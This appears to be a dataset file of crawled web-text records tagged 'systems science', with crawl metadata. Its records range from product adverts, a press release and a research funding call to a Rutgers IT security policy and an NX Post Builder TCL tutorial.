astr. Soc., 57, 451-461. Pfender M., and H. Villinger (2002), Miniaturized data loggers for deep sea sediment temperature gradient measurements, Mar. Geol., 186, 557-570. Stein, J. S., and A. T. Fisher (2001), Multiple scales of hydrothermal circulation in Middle Valley, northern Juan de Fuca Ridge: physical constraints and geologic models, J. Geophys. Res., 106(B5), 8563-8580. Villinger, H., and E. E. Davis (1987), A new reduction algorithm for marine heat-flow measurements, J. Geophys. Res., 92, 12,846-12,856. Von Herzen, R. P., and A. E. Maxwell (1959), The measurement of thermal conductivity of deep-sea sediments by a needle probe method, J. Geophys. Res., 64, 1557-1563. Woodside, W., and J. Messmer (1961), Thermal conductivity of porous media, J. App. Phys., 32, 1688-1706.
systems_science
http://elgressy.com/list.asp?categoryId=312
2019-05-20T12:39:38
s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232255944.3/warc/CC-MAIN-20190520121941-20190520143941-00060.warc.gz
0.845047
411
CC-MAIN-2019-22
webtext-fineweb__CC-MAIN-2019-22__0__168106831
en
Guldager Electrolysis System - Corrosion Protection Prevention and Correction The Guldager Electrolysis System both prevents corrosion and works to cure the affects of corrosion already present in the system and is effective in water tanks and all the pipes leading in and out of the system whether galvanized, plastic or copper. The system can be installed in hot and cold water systems Off the Shelf System The Guldager Electrolysis System connects externally to the water system and requires no complicated installation procedures or alterations to your existing system. This represents a significant saving in installation and maintenance costs. Guldager Electrolysis - One System, Multiple Benefits The electrolysis process is free of harmful chemicals and harmless to the environment and humans. Safe drinking water The Guldager System does not adversely affect drinking water quality or taste. The Guldager System has low energy needs and low water consumption rates. Prevents damage and blockage By eliminating scale buildup and corrosion the Guldager System helps prevents pipe and water tank damage as well as pipe blockages. Automatic and controlled The system is fully automatic and provides complete control over water quality. Extended life span The Guldager System extends the life span of hot and cold water systems in both the industrial and private sectors. Low Installation costs Because the Guldager System is installed externally to your existing system, installation is a relatively easy and cost efficient process. Guldager - The Electrolysis Process Electrolysis and the use of innovative, patented technology, prevents scaling. A combination of a constant direct current and an aluminum electrode releases trace elements of harmless aluminum into the water. These trace elements are distributed throughout the system and build up a uniform protective layer on all internal surfaces. This process occurs even in water temperatures above 60o C. This layer protects the system from the effects of corrosion, prevents the spread of corrosion already present and prevents scale build-up.
systems_science
https://www.mccuecontracting.com/project/539/
2023-12-06T20:54:46
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100603.33/warc/CC-MAIN-20231206194439-20231206224439-00456.warc.gz
0.920884
191
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__11673001
en
We installed a Liquid Boot® vapour intrusion barrier system for BC Hydro’s Big Bend Substation, located in Burnaby, British Columbia. The purpose of the system is to prevent any methane gas accumulating in the subsurface under the building foundation slab from entering the building envelope. The project involved the installation of a geotextile liner over a layer of venting gravel located below the foundation slab of the building. Liquid Boot liquid membrane was then spray applied over an area of 2,800 ft2 to a thickness of 60 mils. The liner system accommodated over two dozen separate penetrations, including vapour management piping, electrical conduit, and grounding cables. McCue performed smoke testing of the liner, as well as general inspection services, to ensure the integrity of the system. As a final measure, a layer of protective course geotextile was installed over the Liquid Boot membrane to prevent potential damage to the liner system.
systems_science
https://andrew-millar.co.uk/hmpps.html
2022-01-27T17:20:39
s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320305277.88/warc/CC-MAIN-20220127163150-20220127193150-00547.warc.gz
0.95249
986
CC-MAIN-2022-05
webtext-fineweb__CC-MAIN-2022-05__0__223507187
en
Her Majesty's Prison and Probation Service Prisoner Escort and Custody Services enables users to request moves from police stations, prisons, custody suites and courts, in order to move people within the criminal justice system between these establishments. Since 1994, the contract has been outsourced – in 2017, the contract undertook over 622,000 moves coming from police custody suites, prisons and courts across the country, covering around 10.5 million miles of distance I was hired to help with the digital transformation of the fourth generation of this service in 2019, leading the design across the entire programme of work over multiple streams. The revised contracts for the Prisoner Escort and Custody Service (PECS) built on the current arrangements within England and Wales - introducing an updated fleet of escort vehicles with enhanced safety and security features, and an innovative digital platform which provides real-time data on the location of detainees and prisoners who are being moved. During development of MoJ’s ‘Book a Secure Move’, we utilised dual-track agile – extending the agile process to include discovery, running parallel to delivery. We benefited from continuous learning – through a wealth of learning opportunities through qualitative feedback and quantitative data to make evidence-based decisions. We experienced better outcomes with less waste – through better understanding of our users we only delivered products that were desirable, viable and feasible, while also being bolder when exploring ideas. To understand the existing space, we conducted research with all users across the criminal justice system – including Police, Courts and Prisons – running a mixture of initiatives, including quantitative and qualitative methods, such as journey mapping, focus groups, interviews, usability testing, and surveys. We aligned the needs of users with the wider goals within the contract, alongside meeting the technical complexities we had identified. From planning a move to calculating its price after completion, a considerable admin burden is placed upon users due to inefficient ways of working - entailing a mix of tools, manual processes and disjointed channels. This impacts information relevant to moves (for example, risk and health) – often being out of date or missing as users are required to access and maintain separate systems, using inconsistent formats and local ways of working. This leads to delays and errors in transportation, and heightened risk for people being moved and those they come into contact with. In addition, Assurance and Finance teams need to manually complete checks and assure moves from the previous month (approximately 5,000 moves). We engaged with a wide range of stakeholders and users over multiple departments and at multiple levels across the criminal justice system – including prisons, police, courts, NHS and third-party suppliers at portfolio, programme and service level. We collaborated to address challenges and develop solutions through creative workshops which I designed and facilitated – ensuring the service was desirable for users, viable for the business and technically feasible. Solutions were prototyped for research with real users in real environments. Research findings were synthesised to identify trends and insights, which were shared and prioritised with the wider team to inform the next iteration. We quickly adapted during the pandemic to minimise disruption, switching to remote working. Once live, analytics were used to help further refine our service. For example, we identified a serious performance problem at the same time every week – further investigation revealed the cause being multiple people downloading reports simultaneously which, combined with database performance issues, was affecting the site. I worked with the tech leads to address this by optimising the database queries and changing the design of the page to reduce load time. From the outset, we developed ‘Book a Secure Move’ to GDS Service Standards and meet Accessibility and Assisted digital needs. We implemented WCAG2.1 guidelines and conducted research with users with specific needs (where possible) to ensure the service could be used by those with visual, hearing, cognitive or physical impairments. As of today, the ‘Book a Secure Move’ service is rolled out across every police custody suite, prison, and youth establishment in England and Wales. It is used daily by over 20,000 users across the criminal justice system, in over 700 establishments to book over 1500 moves per day. whether to request moves or to update risk assessments on the service, or to manage capacities in prisons and identify if any capacity issues need to be addressed. The service has a 95% user satisfaction rating and 97% user engagement. Suppliers performing moves can process the move requests for individuals (including risk and health information) and plan moves accordingly. They can also manage moves, and record events against moves which can be seen by receiving establishments. Ministry Of Justice employees can monitor moves in progress and access the reporting function to identify how the service is performing. 97% of the moves are now automatically costed, and do not need to be assured by operational teams.
systems_science
http://projects.aifb.kit.edu/effalg/oc/inhalte/antragstellung.php
2022-09-30T19:41:01
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00720.warc.gz
0.876427
987
CC-MAIN-2022-40
webtext-fineweb__CC-MAIN-2022-40__0__58214156
en
The senate of the German Research Foundation (DFG) has approved a priority program (SPP) about "Organic Computing", which started its first phase July 1st, 2005. This call for proposals concerns the third and final phase of the priority program from July 1st, 2009 to June 30, 2011. The mission of Organic Computing is to tame complexity in technical systems by providing appropriate degrees of freedom for self-organized behaviour adapting to changing requirements of the execution environment, in particular with respect to human needs. According to this vision an organic computer system should be aware of its own capabilities, the requirements of the environment, and it should be equipped with a number of "self-x" properties allowing for the anticipated adaptiveness and for a reduction in the complexity of system management. These self-x properties include self-organisation, self-configuration, self-optimization, self-healing, self-protection and self-explanation. To achieve these ambitious goals new methods, new techniques, and new system architectures have to be developed. Their potential and relevance should be demonstrated with respect to demanding application scenarios. The major objectives of this priority program are grouped into the following topical areas: Controlled self-organisation in technical systems Insights about the behaviour of natural and artificial complex systems shall be used to open up the necessary degrees of freedom for self-organized behaviour of technical systems. This requires projects on the theory of complex technical systems, investigating the possibilities to establish goal-oriented emergent processes and, in particular, looking at the problems of security and stability of self-organized technical systems. Methods are needed that allow for self-organized behaviour while directing a system towards desired emergent behaviour, and to detect and prevent undesirable Technologies for Organic Computing New base technologies are needed to support the technical utilisation of the principles of self-organisation in the implementation of organic computer systems. Complete organic computer systems will need adequate (multi-level) system architectures. Therefore, an essential objective is to build up a versatile toolbox containing balanced concepts, methods, and tools for the design and implementation of organic computer systems. Furthermore, an evaluation of the effectiveness and efficiency of organic computer systems will require new methods and metrics for an appropriate system analysis. The third phase of the priority program will shift its emphasis from research on fundamental insights into the principles of self-organisation to the design and experimental investigation of generic concepts for architectures and tools for realizing organic computer systems. Research proposals must clearly identify the aspects of self-organisation. The priority program does not allow for explicit design of application systems. But it will be indispensable to evaluate the anticipated methods and technologies of OC with respect to relevant technical application areas. In particular, at the end of this priority program, the major achievements of the research projects with respect to the engineering of organic computer systems should be clearly visible. Proposals (in English AND in compliance with the official guidelines and proposal preparation instructions of DFG [RTF]) for the third and final phase of the program must be available quintuplicate (attachments in triplicate, everything punched, but not stapled) with the keyword "SPP 1183 - Organic Computing" in the office of the DFG by November 21, 2008 !!! The deadline has been extended to December 5, 2008 !!!. An additional copy of the proposal in PDF-format must be sent by email to the coordinator of the project, Prof. Dr. Hartmut Schmeck. The cover sheet (Template: has to be sent by email to Questions about Organic Computing are answered by the coordinator of the SPP: Prof. Dr. Hartmut Schmeck Institut AIFB Universität Karlsruhe (TH) Karlsruhe Institute of Technology (KIT) email: phone: +49 (721) 608 42 42. For questions on setting up the proposal please contact: Valentina Damerow email: phone: +49 (228) 885 24 99. Call for Proposals of SPP 1183 "Organic Computing" Phase 3 (2009-2011) on the DFG Website The Cover Sheet Template for Project Proposals: Official Guidelines and Proposal Preparation Instructions with Supplementary Instructions from DFG:
systems_science
https://voicent.com/pr/pr_7.0.2_sip_voip.php
2023-03-28T09:42:09
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948817.15/warc/CC-MAIN-20230328073515-20230328103515-00085.warc.gz
0.90862
680
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__240752105
en
Share This Post: Dec 5, 2004 VOICENT PRODUCTS NOW SUPPORT SIP BASED VOIP SERVICE Santa Clara, Calif. - July 10, 2009 - Voicent Communications, Inc (http://voicent.com), a provider of comprehensive business phone software has announced the support for SIP (Session Initiation Protocol) among all its current product lines, including: IVR Studio, Flex PBX, Agent Dialer (predictive dialer and force dialer), BroadcastByPhone Autodialer, and Voicent VoiceXML Gateway. With SIP support, customers can now manage and automate their incoming phone calls and outbound campaigns without any telephony hardware, making Voicent software easy to setup and maintain, and making the Voicent solution ideal for large enterprises and small businesses alike. Session Initiation Protocol (SIP) is an emerging standard for Voice over Internet Protocol (VOIP). It allows enhanced voice services to high speed internet users, over DSL, ADSL or cable modem. Being an international standard that is fast becoming mainsteam, SIP allows businesses to achieve huge savings in their telephone operating cost - made possible by more competition among VOIP service providers. For enterprises that have already deployed an SIP based solution, such as SIP compatible PBX system, Voicent software can be easily configured to use the exising infrastructure. For example, a customer can create a powerful IVR application that is fully integrated with the existing customer database and company website, by simply using point-n-click operations in the intuitive development environment of Voicent IVR Studio. For businesses that are adopting SIP and VOIP technology, Voicent provides a complete solution for managing both inbound and outbound phone calls. Voicent software can be readily configured to work with any SIP-based service provider. "Nowadays, there is absolutely no need for a business to purchase a traditional phone system", said Jeff Larson, vice president of product development, Voicent. "By adopting VOIP, which utilizes an existing internet connection for phone calls, a business can avoid costly hardware installation and maintenance, and in addition, enjoy low nation-wide calling rates. With SIP support, Voicent products are well positioned to provide our customers all the necessary tools to operate in this new and exciting environment." Pricing and Availability SIP support is availabe in release 7.0.2, currently in beta. Besides SIP, Voicent software also supports Skype and traditional phone lines. A trial version can be downloaded from Voicent website (http://voicent.com/download). Customers who purchase now can upgrade to any future 7.x production release for free. Products can be purchased from the Voicent online store (http://voicent.com/store), and prices start at $299. Share This Post: What We Offer Voicent gives you the tools to connect and engage with customers. We offer predictive dialers, auto dialers, marketing automation, inbound IVR handling, phone and text/SMS surveys, bulk SMS, email marketing, and more. Whether you're a small business owner, hospital, nonprofit, government agency, or a global call center, we're confident that our award-winning, feature-rich software will help you connect, engage, and succeed.
systems_science
https://orthexo.de/en/german-bionic-presenting-three-new-products-solutions-apogee-smart-safety-and-dashboard/
2023-02-08T00:04:06
s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500664.85/warc/CC-MAIN-20230207233330-20230208023330-00531.warc.gz
0.941228
536
CC-MAIN-2023-06
webtext-fineweb__CC-MAIN-2023-06__0__182377425
en
Apogee Power Suit: intelligent robotic exoskeleton for the working world The compellingly designed, AI-based Apogee is the latest generation of intelligent robotic wearable tools from German Bionic. The exoskeleton is even lighter and more comfortable than its predecessors and opens up additional areas of application. The dust- and waterproof power suit ensures greater safety in the workplace by relieving the lower back of up to 30 kilograms during every lifting movement and minimizing fatigue with active walking support. The Apogee can be easily integrated into work processes and is immediately effective wherever heavy lifting and carrying are part of everyday work, such as in logistics, production or even healthcare. Smart Safety Vest: ergonomic protection for all - as simple as possible German Bionic's Smart SafetyVest combines cutting-edge sensor technology and AI to enable data-based, ergonomic analyses, evaluations and recommendations for action at the click of a mouse or the tap of a finger. In addition to individual workplace analyses, the wearable can identify ergonomic risks as well as potential for improvement and thus reduce signs of fatigue and injuries, which can sometimes lead to high levels of sick leave and absenteeism - regardless of the type of activity performed. German Bionic IO: the first ergonomics data platform for the workplace At the heart of the innovations presented at CES 2023 is the pioneering cloud-based platform German Bionic IO. It makes occupational safety and health protection not only measurable, but also vivid. The system analyzes the data collected by Apogee, Cray X and Smart SafetyVest, continuously learns through machine learning and AI, and improves the respective safety measures with every movement of the wearer. In this way, the respective risks, trends and process optimizations can be determined, tailored to the work environment and the device used. With the Smart Safety Companion ergonomics early warning system, which indicates, for example, incorrect posture, incorrect lifting or excessive loads, the German Bionic IO platform offers comprehensive monitoring and reporting functions as well as individualized recommendations for action based on real, practice-relevant real-time data. "Our new wearables now give hardworking people the right tools to perform their jobs more safely and therefore more sustainably. With our two new ergonomic wearables Apogee and Smart SafetyVest, as well as our well-proven exoskeleton Cray X, we can now provide the right support for almost every company and every work environment where manual work is performed, and with the German Bionic IO data platform, a powerful analysis tool," says Norma Steller, CPO of German Bionic
systems_science
https://oit.rutgers.edu/standards-for-management-of-systems
2019-06-25T23:52:04
s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627999964.8/warc/CC-MAIN-20190625233231-20190626015231-00210.warc.gz
0.94904
3,202
CC-MAIN-2019-26
webtext-fineweb__CC-MAIN-2019-26__0__212022923
en
The Internet is an extremely valuable tool. Unfortunately its use carries with it corresponding responsibilities. There are a number of people, both at Rutgers and throughout the world, who attempt to use the Internet in ways that are abusive or that interfere with operation of other systems. All organizations that attach to the Internet are expected to adopt policies to deal with this situation. This document outlines the policies that apply to individual Rutgers departments, organizational units, and system administrators. This document will use the term "department" to refer to any unit within the University that operates computer systems. This includes both units with central computing support staff and those where computing support is done more informally, including units in which individuals are responsible for the computer on their own desk. The primary policy document for computing at Rutgers is the Acceptable Use Policy and guidelines. See the Computing Policies page for these documents. Under the Acceptable Use Policy, system administrators have the "responsibility of ensuring the integrity, confidentiality, and availability of the resources they are managing." This document outlines some of the implications of that. See the RUSECURE web page for additional information about relevant policies and laws, as well as best practices in the areas of information protection and security. The most basic requirement for responding to problems is this: We must be able to identify a responsible person to deal with problems for all activities on the Internet. That has the following implications: Allocation of IP addresses [This section applies to subnets that are intended to communicate with the rest of Rutgers and the Internet. It is possible to set up a subnet that is not connected with any other network. In this case the procedures described here are technically not applicable. However in order to avoid confusion, we strongly recommend contacting the Rutgers Hostmaster to request an official range of IP addresses even for disconnected networks.] Typically reports of problems are identified by the IP address of the source. Thus we need some way to identify a contact who can pursue problems for any IP address at Rutgers. This is done through a process of assigning and registering IP addresses. There are two levels of address assignment/registration. The first is for a subnet. A subnet is a specific physical network connected to a single router port. (Technically, it is a "broadcast domain".) Generally there will be one or more subnets per department. Each subnet has a range of IP addresses allocated to it. This range is assigned by the Rutgers Hostmaster, [email protected]. As part of the process for address assignment, the department must designate one or more "Network Liaisons." The Network Liaisons will be the contact for any questions about the network. This specifically includes problems caused by computers on the network. The Network Liaison will be expected to arrange for problems to be dealt with, and to report back on its disposition. (However the initial responsibility for dealing with problems rests with the person designated as the RP. See below.) The second level of address assignment is individual IP addresses. In order to communicate with the rest of Rutgers and the Internet, a computer must be given an IP address. There are several ways to do this. The simplest approach is to assign a permanent address to each system. However it is also possible to use software that allocates addresses dynamically. In any case, the IP address assigned to a computer must be within the range authorized for the subnet to which it is connected. The most common procedure is for IP addresses to be assigned by and registered with the Rutgers Hostmaster. This may be done by contacting the hostmaster at [email protected]. The hostmaster will register addresses on request. They can also set up departmental staff to be able to register addresses themselves in the hostmaster's database, using software supplied by the hostmaster. This is recommended for departments that regularly add or change systems. It is also possible for the Hostmaster to delegate responsibility for address allocation to a department. In this case the department is required to maintain records so that it can identify what computer is using any given IP address. If the department has chosen to assign addresses dynamically, records showing how addresses were in use should be kept for at least 60 days. It is important to make sure that you contact Hostmaster to get a registered IP address before using a computer on the network, unless responsibility for address allocation has been delegated to your department. Whether addresses are allocated by the Hostmaster or the department, it is expected that each address will have a description in the Domain Name System (DNS). These descriptions are created by the Hostmaster as part of assigning an address. Most software that departments would use to maintain addresses will provide DNS data for the department. (As part of delegating responsibility for address maintenance to a department, Hostmaster will arrange to link that department's DNS software into the University's system.) All services provided by OIT assume that addresses are registered with DNS. If a system does not have a DNS entry, various services (e.g. email) at Rutgers and elsewhere will not work. It is important for each unit to consider what contacts should be used to report abuse and other network problems. The DNS system can maintain an entry called the "Responsible Person" (RP) for each IP address. Normally departments are asked to specify the RP for each address that is assigned. Where responsibility for address maintenance has been delegated to a department, the department should create RP entries for all hosts in its DNS system. If RP entries do not exist for a given address, OIT staff will contact the Network Liaison. However you should be aware that Network Liaisons are not currently visible outside Rutgers, and have limited visibility even within Rutgers. Thus most network managers will expect to find RP records for every host. They may take unpredictable actions if they are having problems from a host that does not have an RP record. Departments are responsible for keeping both Responsible Person and Network Liaison information up to date as staff and systems change. The University is currently very near to running out of IP addresses, at least in the pool of addresses that are visible to the Internet. In order to allow for new systems, OIT needs to be able to reallocate addresses that are no longer in use. Thus OIT will poll Network Liaisons on a regular basis to verify that the address ranges assigned to them are still in use. Logging on individual systems System administrators need to think about how they would deal with reports of problems from their system. In many cases they will need to keep logs that will allow them to tie Internet activities to identifiable people. For many systems, this is not a problem: the system is located in an individual's office, and is used primarily by that person. In such cases, that individual would normally be responsible for all use of the system, whether their own or others that they permit to use the system. For multiuser systems, or systems in public areas, there must be some mechanism for identifying users. One common approach is that all users must login with a username and password. Where this is not possible, less formal mechanisms may be used. For example, some public labs check ID cards of users and keep a log of usage by system. Every system for which Internet access is possible must have good enough mechanisms that the system administrator can deal with any reports of problems. Logs must be kept for at least 60 days. (This interval may be adjusted from time to time by the Information Protection Division, based on experience in handling problems.) Information from the logs must be made available to staff assigned to the Information Protection Division if it is needed to investigate network security problems or abuse. Staff should also give thought to a maximum lifetime for logs. Be aware that any log is subject to subpeona or other legal process. This may be burdensome if logs are kept for a long period of time. Departments may be asked to describe their logging procedures as part of getting authorization for a subnet to be enabled for access to the Internet. No mechanism for identifying users is perfect. However departments need a place to start investigations when a problem occurs. Administration of Individual Systems There are currently active attacks being made throughout the Internet. Any system connected to RUnet can expect to be the subject of a variety of attacks. In many cases the goal of an attacker is to compromise a system, and then use that system as a base for attacks on other systems. All systems must have someone who plays the role of system administrator. (In many cases the owner of the system is effectively acting as system administrator.) The system administrator is responsible for software installation and configuration, as well as monitoring the system for inappropriate use, and use of "best practices" in protecting their system from compromise. These responsibilities also apply to individuals connecting systems at home or elsewhere to the Rutgers network via dialups, wireless networks, publicly accessible ports, VPN's, etc. One of the major responsibilities of the system administrator is to keep software up to date. Most vendors issue security-related patches on a regular basis. Systems that do not install these patches are much more likely to be compromised. Rutgers University has licensed anti-virus software on a site-wide basis. For system architectures where viruses are common, system administrators are expected to install anti-virus software and keep it up to date, System administrators are encouraged to take additional security precautions, such as use of a firewall or host-based firewall software. OIT has made arrangements to purchase one common host-based firewall product (Zonealarm) at a substantial discount. Note that the Acceptable Use Policy and Guidelines charges computing and information technology providers throughout the University with preserving the integrity and security of resources. The preceding paragraphs outline minimal security precautions, which we believe apply to all systems. However many systems need additional security work. This includes particularly systems holding data such as social security numbers, medical information, and other information where confidentiality is required by law or University policy. Under the Acceptable Use Policy, staff are responsible for assessing the nature of information and services on their systems and following best practices at an appropriate level. These will often include additional precautions not listed here. In particular, data whose compromise could produce significant dangers to a user or the University should be transmitted using SSL or similar encryption techniques, and it should be stored on systems whose security has been carefully reviewed by security professionals. This includes (but is not limited to) personal data such as SSN's, medical information, student records, and credit card information. In some cases, techniques should be used to avoid storing this information at all (e.g. using an external service to handle credit card-based transactions). Passwords and other authentication information should be protected at the same level as the data which they control. Any application dealing with standard University passwords (those associated with the NetID, or with accounts on OIT administrative or general-access campus systems) should protect transmission of the passwords using SSL or an equivalent technology. In addition to overall system security, administrators are expected to control the access to confidential data provided to individual users. Access to confidential data should be provided only as needed for the person's job function, or for non-Rutgers employees, a function delegated to them by a unit at Rutgers. We recommend that units have explicit policies, so that users' obligations with respect to confidential data is clear. One example of such a policy is the Agreement for Accessing University Information. Please note the NetID/Email policy. This policy mandates transition away from use of the SSN for authentication. No new applications may be written using the SSN for authentication, and existing applications must be transitioned. While the document states that the NetID must be used, this does not apply to internal departmental applications, where the department has its own usernames. However even departmental applications may not use the SSN for authentication. We encourage departments to develop security plans for systems and information under their control. Staff from the Information Protection division are available to discuss security recommendations for specific situations. Also note the provisions in the Acceptable Use Policy and Guidelines regarding confidentiality and privacy. System administrators are expected to abide by those policies. We encourage departments to develop privacy policies consistent with the Acceptable Use Policy, and share those policies with their users and other customers. Two examples of privacy policies within OIT are available on the Computing Policies web page. These may serve as models for departments. OIT provides limited support for system administrators of common system types (Windows, Macintosh and the most common forms of Unix). This includes web areas, email lists, and regular meetings. Security issues are regularly discussed there. All systems at Rutgers are expected to control mail relaying. This is an issue only for systems that are running software that delivers email. Normally this includes all Unix systems. It is not an issue for Windows and Macintosh system unless software such as Mercury or Exchange has been installed. Note that the software we're talking about is software that delivers mail, not mail reading software such as Netscape Communicator, Pegasus, or Outlook Express. Systems that run mail delivery software must be set up to reject attempts by systems outside Rutgers to get them to relay email to other systems outside Rutgers. For a specific discussion of this issue, see Dealing with Spam Being Forwarded by Your System OIT reserves the right to take action when problems on an individual system affect other systems at Rutgers or on the Internet as a whole. Examples of situations where OIT would take action include, but are not limited to - systems are compromised by a hacker, and are then used as a base to launch attacks against other systems - systems are used to relay spam - users on a system send abusive email, or post information (e.g. as web pages) that violates University policy or copyright laws. Where possible OIT will attempt to notify the owner or administrator of a system before taking action. As described above, OIT staff will use the RP records and Network Liaison to locate staff to notify. However immediate action may be necessary when there is an ongoing attack against other systems, or when the problem is seriously interfering with the performance of the network. Depending upon the nature of the problem, the system in question, or the entire departmentl network of which it is a part, may be disconnected from RUnet or the Internet. When immediate disconnection is not necessary, system administrators will still be expected to take prompt action, to diagnose the problem, to stop any ongoing abuse, and to make whatever changes are needed to prevent reoccurrence. Generally this will involve adopting "best practices" for security. This process should preserve any evidence that might be needed to locate the source of the problem and take any legal or disciplinary action that might be appropriate. When OIT has referred a problem to a system administrator for action, a brief report on the resolution should be made. This will allow OIT staff to verify that all problems are dealt with, and to maintain statistics on the types of problems that are occurring. System administrators are also encouraged to notify the Information Protection division of problems that they discover themselves. From time to time, OIT also conducts scans for problems, in an attempt to discover security weaknesses before someone uses them to break into systems. System administrators will be notified of problems discovered by this process. Normally this notification will be accompanied by advice on how to remedy the problem. Remedying problems of this sort is not as time-critical as dealing with actual breakins. However system administrators are expected to deal with the problems in a timely fashion, and report the results.
systems_science
http://www.endesin.com/nx-technical-articles/post-builder-custom-commands
2018-03-23T16:49:52
s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257648404.94/warc/CC-MAIN-20180323161421-20180323181421-00250.warc.gz
0.904083
1,398
CC-MAIN-2018-13
webtext-fineweb__CC-MAIN-2018-13__0__183134007
en
Post Builder Custom Commands In this NX A to Z article, we are going to talk about writing custom commands in Post Builder. Custom commands allow you to get just about whatever you want in your machine code file. We all know that the graphical tools within Post Builder provide a great way to configure the standard components of a postprocessor, but what about the non-standard stuff – that is what custom commands are for. For an introduction to Post Builder, click Postprocessors written for NX are written in a language called TCL (Tool Command Language). TCL is a scripting language, meaning that it is not compiled, and it’s syntax resembles C. TCL is a fairly straightforward language; however, it’s syntax can be troublesome. The link below is a very good resource for learning TCL; however, the best method for writing TCL is to copy it from an existing custom command that implements the same function you are trying to implement and then change the variables and expressions as required. For example, if you are trying to write and if…else loop, just find one in an existing custom command and change it as required to suit your desired functionality. This will help to eliminate a lot of the headaches due to syntax errors. Manufacturing Output Manager (MOM) Before you write custom commands, you first need to understand how NX communicates with your postprocessor. When you postprocess a program from with NX, NX starts a program called NX Post. The primary component of NX Post is the Manufacturing Output Manager (MOM). MOM is described in the NX Help Documentation as follows: The Manufacturing Output Manager (MOM) is the central core of the NX Post postprocessor module. MOM converts tool paths from model files into manufacturing output (machine code) by adding the required functions and data as described below: The Event Generator reads through the tool path data, extracts events and their associated variable information, then passes the events to MOM for processing. MOM applies kinematics to the output then passes the event with its associated data to the Event Handler. The Event Handler creates the event, processes it to determine the actions required, then returns the data to MOM. MOM reads the Definition File to determine how to format the output for the machine tool control. MOM writes the formatted output to the specified Output File as machine code. So, essentially, MOM reads the tool path in NX and then feeds the tool path through the postprocessor to generate the machine code. In order to write custom commands, you have to intercept the information that MOM is sending to the postprocessor and then manipulate it however you want and then send it to the machine code file. All of the information that MOM sends is in the form of MOM variables; furthermore, there are built-in commands available for you to use in your custom command and these are called MOM commands. You can see all of these variables and built-in commands and their descriptions by clicking on the menu in Post Builder and select Browse MOM Variables . You will see the window shown below. The built-in commands start with an uppercase and the variables with lowercase . There are way too many built-in commands and variables to go through them. The approach that we will use is to set out to do something specific with our postprocessor and then used the MOM Variables browser to find the variables and built-in commands we need. So the next step is to open our postprocessor and select the tab as shown below. This is a postprocessor that comes with NX for a 5-axis table table mill. Most of the custom commands that you see in the list are created by default when you create a new postprocessor. Some are used by default in certain parts of the program and the rest are available should you need them. For example, the custom command shown below, is put into the tool change event by default when a new post is created. It uses the built-in command to force the output of the tool length compensation data. Custom commands like are driven by machine control events in NX and do not appear in any tool path events. Custom commands like are not used by default and must be placed in an event marker after the post has been created if they are to be used. There is also a library of custom commands available to be imported into a postprocessor. If you click you will see the list shown below. There a lot of custom commands available and they are described in the Documentation under Manufacturing->Post Builder->Program and Tool Path->Custom Command->Custom Command Library So enough about all the custom commands that are already done, let’s write one of our own. It is just a simple custom command to put name of the program at the start of the machine code file. In Post Builder, click on the Custom Command tab and Post Builder will create a copy of whatever custom command you have selected as shown below. So delete all the code and rename the custom command . Now we need a variable that comes from NX with the name of the program and a built in command that will output the name to the machine code file. If you open the MOM Variables Brower and search program name, you will see that is the variable that we want and if you set the search category to and search for output, you will see that is the build in command that we want. So in our Custom command, we type MOM_output_literal “Program Name: $mom_group_name” The first line is a variable declaration. We are declaring the variable and the global statement indicates the scope of the variable. The global scope is the entire MOM process, meaning that if there is already a variable with the name that exists anywhere in the MOM process, we will be accessing that variable. It also means that if we change the variable, it will be changed for the entire MOM process until it is changed again by MOM. So essentially we are grabbing the variable from MOM and writing it out the machine code file. The $ in the second line is a syntax character – it indicates that the word that follows is a variable name and substitutes the variables value into the output. This is shown below Then we place this custom command in the Program Start Sequence as shown below Then post a program and this is what you get That’s it. Remember, your best bet is to find an existing custom command that does something similar to what you want and start changing it to get what you want. We’ll talk about debugging custom commands in a future article.
systems_science
http://www.cs.up.ac.za/
2015-03-05T23:56:45
s3://commoncrawl/crawl-data/CC-MAIN-2015-11/segments/1424936465069.3/warc/CC-MAIN-20150226074105-00061-ip-10-28-5-156.ec2.internal.warc.gz
0.885767
239
CC-MAIN-2015-11
webtext-fineweb__CC-MAIN-2015-11__0__100377154
en
Research Director of Brussels AI Lab receives Honory DoctorateMarco Dorigo, a research director for the Belgian Funds for Scientific Research (FNRS) and a co-director of IRIDIA, the artificial intelligence lab of the Université Libre de Bruxelles will be receiving an honoury doctorate from the University of Pretoria in April 2015. Marco Dorigo has collaborated extensively with CIRG, the Computational Intelligence Research Group of the Department of Computer Science, University of Pretoria. This has resulted in a series of ground breaking papers in swarm intelligence. Mardo Dorigo will be presenting a talk on Swarm robotics research at IRIDIA at 15h30 on 20 April (see second news item). Read More Welcome to the Department of Computer Science at the University of Pretoria. Our main objective is to explore and research the scientific basis of new technologies. We furthermore promote the proliferation of reliable, robust and innovative computing and information technologies into the IT industry in South Africa. Excellence in computer science education, the development of internationally and nationally recognised research initiatives, and strong industry collaboration, are the driving factors underpinning the success of the department.
systems_science
https://v18.proteinatlas.org/humanproteome/tissue/appendix
2024-02-26T08:39:46
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474653.81/warc/CC-MAIN-20240226062606-20240226092606-00298.warc.gz
0.909999
2,104
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__200183094
en
